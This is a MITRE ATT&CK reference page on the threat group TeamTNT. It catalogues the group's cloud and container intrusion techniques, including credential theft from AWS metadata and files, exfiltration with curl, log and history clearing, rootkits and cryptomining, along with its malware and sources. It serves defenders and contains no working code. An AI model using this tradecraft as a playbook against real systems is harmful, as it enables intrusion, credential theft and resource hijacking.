Skip to content

G0139 TeamTNT

TeamTNT is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.895234176

Item Value
ID G0139
Associated Names
Version 1.2
Created 01 October 2021
Last Modified 19 October 2022
Navigation Layer View In ATT&CK® Navigator

Techniques Used

Domain ID Name Use
enterprise T1098 Account Manipulation -
enterprise T1098.004 SSH Authorized Keys TeamTNT has added RSA keys in authorized_keys.710
enterprise T1583 Acquire Infrastructure -
enterprise T1583.001 Domains TeamTNT has obtained domains to host their payloads.8
enterprise T1595 Active Scanning -
enterprise T1595.001 Scanning IP Blocks TeamTNT has scanned specific lists of target IP addresses.4
enterprise T1595.002 Vulnerability Scanning TeamTNT has scanned for vulnerabilities in IoT devices and other related resources such as the Docker API.4
enterprise T1071 Application Layer Protocol TeamTNT has used an IRC bot for C2 communications.4
enterprise T1071.001 Web Protocols TeamTNT has the curl command to send credentials over HTTP and the curl and wget commands to download new software.5210 TeamTNT has also used a custom user agent HTTP header in shell scripts.4
enterprise T1547 Boot or Logon Autostart Execution -
enterprise T1547.001 Registry Run Keys / Startup Folder TeamTNT has added batch scripts to the startup folder.1
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.001 PowerShell TeamTNT has executed PowerShell commands in batch scripts.1
enterprise T1059.003 Windows Command Shell TeamTNT has used batch scripts to download tools and executing cryptocurrency miners.1
enterprise T1059.004 Unix Shell TeamTNT has used shell scripts for execution.410
enterprise T1059.009 Cloud API TeamTNT has leveraged AWS CLI to enumerate cloud environments with compromised credentials.11
enterprise T1609 Container Administration Command TeamTNT executed Hildegard through the kubelet API run command and by executing commands on running containers.3
enterprise T1613 Container and Resource Discovery TeamTNT has checked for running containers with docker ps and for specific container names with docker inspect.4 TeamTNT has also searched for Kubernetes pods running in a local network.10
enterprise T1136 Create Account -
enterprise T1136.001 Local Account TeamTNT has created local privileged users on victim machines.5
enterprise T1543 Create or Modify System Process -
enterprise T1543.002 Systemd Service TeamTNT has established persistence through the creation of a cryptocurrency mining system service using systemctl.410
enterprise T1543.003 Windows Service TeamTNT has used malware that adds cryptocurrency miners as a service.1
enterprise T1074 Data Staged -
enterprise T1074.001 Local Data Staging TeamTNT has aggregated collected credentials in text files before exfiltrating.10
enterprise T1140 Deobfuscate/Decode Files or Information TeamTNT has used a script that decodes a Base64-encoded version of WeaveWorks Scope.10
enterprise T1610 Deploy Container TeamTNT has deployed different types of containers into victim environments to facilitate execution.54 TeamTNT has also transferred cryptocurrency mining software to Kubernetes clusters discovered within local IP address ranges.10
enterprise T1587 Develop Capabilities -
enterprise T1587.001 Malware TeamTNT has developed custom malware such as Hildegard.3
enterprise T1611 Escape to Host TeamTNT has deployed privileged containers that mount the filesystem of victim machine.57
enterprise T1048 Exfiltration Over Alternative Protocol TeamTNT has sent locally staged files with collected credentials to C2 servers using cURL.10
enterprise T1133 External Remote Services TeamTNT has used open-source tools such as Weave Scope to target exposed Docker API ports and gain initial access to victim environments.510 TeamTNT has also targeted exposed kubelets for Kubernetes environments.3
enterprise T1083 File and Directory Discovery TeamTNT has used a script that checks /proc/*/environ for environment variables related to AWS.10
enterprise T1222 File and Directory Permissions Modification -
enterprise T1222.002 Linux and Mac File and Directory Permissions Modification TeamTNT has modified the permissions on binaries with chattr.410
enterprise T1562 Impair Defenses -
enterprise T1562.001 Disable or Modify Tools TeamTNT has disabled and uninstalled security tools such as Alibaba, Tencent, and BMC cloud monitoring agents on cloud-based infrastructure.110
enterprise T1562.004 Disable or Modify System Firewall TeamTNT has disabled iptables.7
enterprise T1070 Indicator Removal -
enterprise T1070.002 Clear Linux or Mac System Logs TeamTNT has removed system logs from /var/log/syslog.7
enterprise T1070.003 Clear Command History TeamTNT has cleared command history with history -c.410
enterprise T1070.004 File Deletion TeamTNT has used a payload that removes itself after running. TeamTNT also has deleted locally staged files for collecting credentials or scan results for local IP addresses after exfiltrating them.110
enterprise T1105 Ingress Tool Transfer TeamTNT has the curl and wget commands as well as batch scripts to download new tools.510
enterprise T1036 Masquerading TeamTNT has disguised their scripts with docker-related file names.10
enterprise T1036.005 Match Legitimate Name or Location TeamTNT has replaced .dockerd and .dockerenv with their own scripts and cryptocurrency mining software.10
enterprise T1046 Network Service Discovery TeamTNT has used masscan to search for open Docker API ports and Kubernetes clusters.2310 TeamTNT has also used malware that utilizes zmap and zgrab to search for vulnerable services in cloud environments.8
enterprise T1027 Obfuscated Files or Information TeamTNT has encrypted its binaries via AES and encoded files using Base64.47
enterprise T1027.002 Software Packing TeamTNT has used UPX and Ezuri packer to pack its binaries.4
enterprise T1120 Peripheral Device Discovery TeamTNT has searched for attached VGA devices using lspci.10
enterprise T1057 Process Discovery TeamTNT has searched for rival malware and removes it if found.4 TeamTNT has also searched for running processes containing the strings aliyun or liyun to identify machines running Alibaba Cloud Security tools.10
enterprise T1219 Remote Access Software TeamTNT has established tmate sessions for C2 communications.310
enterprise T1021 Remote Services -
enterprise T1021.004 SSH TeamTNT has used SSH to connect back to victim machines.5 TeamTNT has also used SSH to transfer tools and payloads onto victim hosts and execute them.10
enterprise T1496 Resource Hijacking TeamTNT has deployed XMRig Docker images to mine cryptocurrency.92 TeamTNT has also infected Docker containers and Kubernetes clusters with XMRig, and used RainbowMiner and lolMiner for mining cryptocurrency.10
enterprise T1014 Rootkit TeamTNT has used rootkits such as the open-source Diamorphine rootkit and their custom bots to hide cryptocurrency mining activities on the machine.4 10
enterprise T1518 Software Discovery -
enterprise T1518.001 Security Software Discovery TeamTNT has searched for security products on infected machines.110
enterprise T1608 Stage Capabilities -
enterprise T1608.001 Upload Malware TeamTNT has uploaded backdoored Docker images to Docker Hub.9
enterprise T1082 System Information Discovery TeamTNT has searched for system version, architecture, disk partition, logical volume, and hostname information.110
enterprise T1016 System Network Configuration Discovery TeamTNT has enumerated the host machine’s IP address.4
enterprise T1049 System Network Connections Discovery TeamTNT has run netstat -anp to search for rival malware connections.4 TeamTNT has also used libprocesshider to modify /etc/ld.so.preload.1
enterprise T1007 System Service Discovery TeamTNT has searched for services such as Alibaba Cloud Security’s aliyun service and BMC Helix Cloud Security’s bmc-agent service in order to disable them.10
enterprise T1569 System Services TeamTNT has created system services to execute cryptocurrency mining software.10
enterprise T1552 Unsecured Credentials -
enterprise T1552.001 Credentials In Files TeamTNT has searched for unsecured AWS credentials and Docker API credentials.2410
enterprise T1552.004 Private Keys TeamTNT has searched for unsecured SSH keys.24
enterprise T1552.005 Cloud Instance Metadata API TeamTNT has queried the AWS instance metadata service for credentials.410
enterprise T1204 User Execution -
enterprise T1204.003 Malicious Image TeamTNT has relied on users to download and execute malicious Docker images.9
enterprise T1102 Web Service TeamTNT has leveraged iplogger.org to send collected data back to C2.710

Software

ID Name References Techniques
S0601 Hildegard 3 Application Layer Protocol Unix Shell:Command and Scripting Interpreter Container Administration Command Container and Resource Discovery Local Account:Create Account Systemd Service:Create or Modify System Process Deobfuscate/Decode Files or Information Escape to Host Exploitation for Privilege Escalation External Remote Services Dynamic Linker Hijacking:Hijack Execution Flow Disable or Modify Tools:Impair Defenses File Deletion:Indicator Removal Clear Command History:Indicator Removal Ingress Tool Transfer Masquerade Task or Service:Masquerading Network Service Discovery Obfuscated Files or Information Software Packing:Obfuscated Files or Information Remote Access Software Resource Hijacking Rootkit System Information Discovery Private Keys:Unsecured Credentials Cloud Instance Metadata API:Unsecured Credentials Credentials In Files:Unsecured Credentials Web Service
S0349 LaZagne 1 Keychain:Credentials from Password Stores Credentials from Password Stores Windows Credential Manager:Credentials from Password Stores Credentials from Web Browsers:Credentials from Password Stores /etc/passwd and /etc/shadow:OS Credential Dumping LSA Secrets:OS Credential Dumping LSASS Memory:OS Credential Dumping Proc Filesystem:OS Credential Dumping Cached Domain Credentials:OS Credential Dumping Credentials In Files:Unsecured Credentials
S0179 MimiPenguin 8 Proc Filesystem:OS Credential Dumping
S0683 Peirates 12 Cloud Storage Object Discovery Container Administration Command Container and Resource Discovery Data from Cloud Storage Deploy Container Escape to Host Network Service Discovery Steal Application Access Token Cloud Instance Metadata API:Unsecured Credentials Container API:Unsecured Credentials Application Access Token:Use Alternate Authentication Material Cloud Accounts:Valid Accounts

References

  1. AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021. 

  2. Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021. 

  3. Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021. 

  4. Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021. 

  5. Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021. 

  6. Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021. 

  7. Kol, Roi. Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021. 

  8. Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021. 

  9. Stroud, J. (2021, May 25). Taking TeamTNT’s Docker Images Offline. Retrieved September 22, 2021. 

  10. Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved August 4, 2022. 

  11. Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved July 8, 2022. 

  12. Nathaniel Quist. (2021, June 4). TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations. Retrieved February 8, 2022.